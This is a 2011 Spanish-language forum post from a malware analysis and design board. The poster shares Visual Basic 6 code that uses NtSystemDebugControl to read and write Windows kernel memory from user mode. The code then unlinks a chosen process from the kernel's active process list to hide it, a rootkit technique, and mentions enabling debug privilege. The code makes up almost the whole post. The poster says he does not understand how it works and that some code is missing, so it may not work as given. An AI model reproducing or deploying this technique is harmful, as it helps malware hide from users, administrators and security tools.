elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [Aporte chico] VB Inject KM from UM		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Aporte chico] VB Inject KM from UM  (Leído 2,718 veces)
Miseryk

Desconectado Desconectado

Mensajes: 225


SI.NU.SA U.GU.DE (2NE1 - D-Unit)


Ver Perfil
[Aporte chico] VB Inject KM from UM
« en: 11 Julio 2011, 21:31 pm »
Hola, acá les dejo un code que por ahí les sirve a los que saben mucho, pude arreglarlo un poco pero no entiendo como funciona, lo que hace es injectar kernel mode desde user mode.

Form1:
Código
  1. Option Explicit
  2.  
  3. Private Sub Command1_Click()
  4. Dim pEP As Long
  5. Dim le As LIST_ENTRY
  6.  
  7. pEP = GetEProcess(Text1.Text) 'PID
  8.  
  9. Call ReadKernelMemory(pEP + &H88, VarPtr(le), 8)    'Dereference LE
  10.  
  11. MsgBox le.pBlink & vbCrLf & le.pFlink
  12. Stop
  13.  
  14. 'Call RtlAdjustPrivilege(20, 1, 0, 1)
  15. 'Also: Make sure you have SeDebug enabled of course.
  16. 'Can be easily done with: (20 = SeDebug's priv val)
  17. 'Call RtlAdjustPrivilege(20, 1, 0, 1)
  18. 'Fun stuff indeed
  19.  
  20. Call WriteKernelMemory(le.BLink, VarPtr(le.FLink), 4)     'A.FLink = &(C)     AKA: *(B.BLink+0) = le.FLink        This changes A's FLink from the address of B, to the address of C
  21. Call WriteKernelMemory(le.FLink + 4, VarPtr(le.BLink), 4) 'C.Blink = &(A)     AKA: *(B.FLink+4) = le.BLink        This changes C's BLink from the address of B, to the address of A
  22. End Sub
  23.  
  24. Private Sub Form_Load()
  25. Text1.Text = GetPEBAddress
  26. End Sub
  27.  

Module1
Código
  1. Option Explicit
  2.  
  3. 'To modify kernel memory from usermode  you can use the NtSystemDebugControl API function.
  4.  
  5. 'Found it from some chinese forum =].
  6. 'You wouldn 't believe the kind of crazy stuff they implement inside of VB6. (Most I cannot understand though because I lack knowledge of ASM.)
  7.  
  8. 'That code has really opened new doors for me and really got me interested in kernel data structures, rootkits, WinDbg, and the book "Subverting the Windows Kernel"
  9. 'In any case, here is an example of hiding a process by unlinking it from the _EPROCESS chain at 0x88 (I think WinDbg calls the member ActiveProcessLinks)
  10.  
  11. Public Type LIST_ENTRY
  12.      pFlink As Long
  13.      pBlink As Long
  14. End Type
  15.  
  16. 'http://forum.sysinternals.com/tip-run-process-in-system-account-scexe_topic16714_post88025.html
  17.  
  18. Public Declare Function NtSystemDebugControl Lib "NTDLL" (ByVal ControlCode As Long, ByRef InputBuffer As Any, ByVal InputBufferLength As Long, ByRef OutputBuffer As Any, ByVal OutputBufferLength As Long, ByRef ReturnLength As Long) As Long
  19.  
  20. Public Type MEMORY_CHUNKS
  21.     VirtualAddress As Long
  22.     Buffer As Long
  23.     BufferSize As Long
  24. End Type
  25.  
  26. Public Const DebugReadVirtualMemory& = 8
  27. Public Const DebugWriteVirtualMemory& = 9
  28.  
  29. Public Type PROCESS_BASIC_INFORMATION
  30.     ExitStatus As Long 'NTSTATUS
  31.     PebBaseAddress As Long 'PPEB
  32.     AffinityMask As Long 'ULONG_PTR
  33.     BasePriority As Long 'KPRIORITY
  34.     UniqueProcessId As Long 'ULONG_PTR
  35.     InheritedFromUniqueProcessId As Long 'ULONG_PTR
  36. End Type
  37.  
  38. Public Declare Function ZwQueryInformationProcess Lib "NTDLL.DLL" (ByVal ProcessHandle As Long, ByVal ProcessInformationClass As PROCESSINFOCLASS, ByVal ProcessInformation As Long, ByVal ProcessInformationLength As Long, ByRef ReturnLength As Long) As Long
  39.  
  40. Public Enum PROCESSINFOCLASS
  41.     ProcessBasicInformation
  42.     ProcessQuotaLimits
  43.     ProcessIoCounters
  44.     ProcessVmCounters
  45.     ProcessTimes
  46.     ProcessBasePriority
  47.     ProcessRaisePriority
  48.     ProcessDebugPort
  49.     ProcessExceptionPort
  50.     ProcessAccessToken
  51.     ProcessLdtInformation
  52.     ProcessLdtSize
  53.     ProcessDefaultHardErrorMode
  54.     ProcessIoPortHandlers '// Note: this is kernel mode only
  55.     ProcessPooledUsageAndLimits
  56.     ProcessWorkingSetWatch
  57.     ProcessUserModeIOPL
  58.     ProcessEnableAlignmentFaultFixup
  59.     ProcessPriorityClass
  60.     ProcessWx86Information
  61.     ProcessHandleCount
  62.     ProcessAffinityMask
  63.     ProcessPriorityBoost
  64.     ProcessDeviceMap
  65.     ProcessSessionInformation
  66.     ProcessForegroundInformation
  67.     ProcessWow64Information
  68.     ProcessImageFileName
  69.     ProcessLUIDDeviceMapsEnabled
  70.     ProcessBreakOnTermination
  71.     ProcessDebugObjectHandle
  72.     ProcessDebugFlags
  73.     ProcessHandleTracing
  74.     ProcessIoPriority
  75.     ProcessExecuteFlags
  76.     ProcessResourceManagement
  77.     ProcessCookie
  78.     ProcessImageInformation
  79.     MaxProcessInfoClass '// MaxProcessInfoClass should always be the last enum
  80. End Enum
  81.  
  82. Public Declare Function NtCurrentTeb Lib "NTDLL" () As Long
  83.  
  84. Public Declare Function IsBadReadPtr Lib "kernel32" (ByVal lp As Long, ByVal ucb As Long) As Long
  85.  
  86. Public Declare Sub RtlMoveMemory Lib "kernel32" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Integer)
  87.  
  88. Public Function GetPEBAddress() As Long
  89.     On Error GoTo NotSupported
  90.     Dim pbi As PROCESS_BASIC_INFORMATION, Dummy As Long
  91.  
  92.     If ZwQueryInformationProcess(-1&, 0&, VarPtr(pbi), Len(pbi), Dummy) = 0 Then
  93.         GetPEBAddress = pbi.PebBaseAddress
  94.     Else
  95.         GetPEBAddress = GetPEBAddressinXP
  96.     End If
  97. NotSupported:
  98. End Function
  99.  
  100. Public Function ReadKernelMemory(ByVal VirtualAddress As Long, ByVal Buffer As Long, ByVal BufferSize As Long) As Long
  101.     Dim MemoryChunks As MEMORY_CHUNKS
  102.     MemoryChunks.VirtualAddress = VirtualAddress
  103.     MemoryChunks.Buffer = Buffer
  104.     MemoryChunks.BufferSize = BufferSize
  105.     ReadKernelMemory = NtSystemDebugControl(DebugReadVirtualMemory, MemoryChunks, Len(MemoryChunks), ByVal 0&, 0, ByVal 0&)
  106. End Function
  107.  
  108. Public Function WriteKernelMemory(ByVal VirtualAddress As Long, ByVal Buffer As Long, ByVal BufferSize As Long) As Long
  109.     Dim MemoryChunks As MEMORY_CHUNKS
  110.     MemoryChunks.VirtualAddress = VirtualAddress
  111.     MemoryChunks.Buffer = Buffer
  112.     MemoryChunks.BufferSize = BufferSize
  113.     WriteKernelMemory = NtSystemDebugControl(DebugWriteVirtualMemory, MemoryChunks, Len(MemoryChunks), ByVal 0&, 0, ByVal 0&)
  114. End Function
  115.  
  116. Public Function GetPEBAddressinXP() As Long
  117.     On Error GoTo NotSupported 'Windows 9X/Me will occures error
  118.     Dim pTeb As Long, ppPeb As Long
  119.     pTeb = NtCurrentTeb 'get TEB
  120.  
  121.     On Error Resume Next ' on error ignore
  122.     If pTeb = 0 Then Exit Function 'if it has invalid TEB, run away this procedure
  123.     ' +0x030 ProcessEnvironmentBlock : _PEB
  124.     ppPeb = pTeb + &H30&
  125.     'check IsValid
  126.     If IsBadReadPtr(ByVal ppPeb, 4) Then Exit Function
  127.     ' returns PEB
  128.     RtlMoveMemory GetPEBAddress, ByVal ppPeb, 4
  129. NotSupported:
  130. End Function
  131.  

Los que quieran aportar conocimientos y funcionamientos, bienvenidos sean :). Saludos.

Edit:
Falta código que no lo pude conseguir ni completar.
« Última modificación: 12 Julio 2011, 03:14 am por Miseryk » En línea
Can you see it?
The worst is over
The monsters in my head are scared of love
Fallen people listen up! It’s never too late to change our luck
So, don’t let them steal your light
Don’t let them break your stride
There is light on the other side
And you’ll see all the raindrops falling behind
Make it out tonight
it’s a revolution

CL!!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
pequeño aporte(proxy),pero aporte al fin.:D
Programación Visual Basic 		Tengu 0 2,575 Último mensaje 22 Julio 2007, 17:33 pm
por Tengu
dll inject by c3r0x.. « 1 2 »
Programación C/C++ 		c3r0x 12 8,418 Último mensaje 2 Julio 2012, 19:24 pm
por x64core
Un chico de 16 años viola a una discapacitada, lo graba y lo sube a Facebook « 1 2 »
Noticias 		wolfbcn 14 8,303 Último mensaje 23 Julio 2010, 05:40 am
por Draklit
Ayuda con Chico UI
Desarrollo Web 		[u]nsigned 0 1,627 Último mensaje 8 Noviembre 2012, 15:01 pm
por [u]nsigned
Ayuda urgente con chico desaparecido « 1 2 3 »
Foro Libre 		cesarcorta 21 7,640 Último mensaje 10 Abril 2014, 22:10 pm
por sanson
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines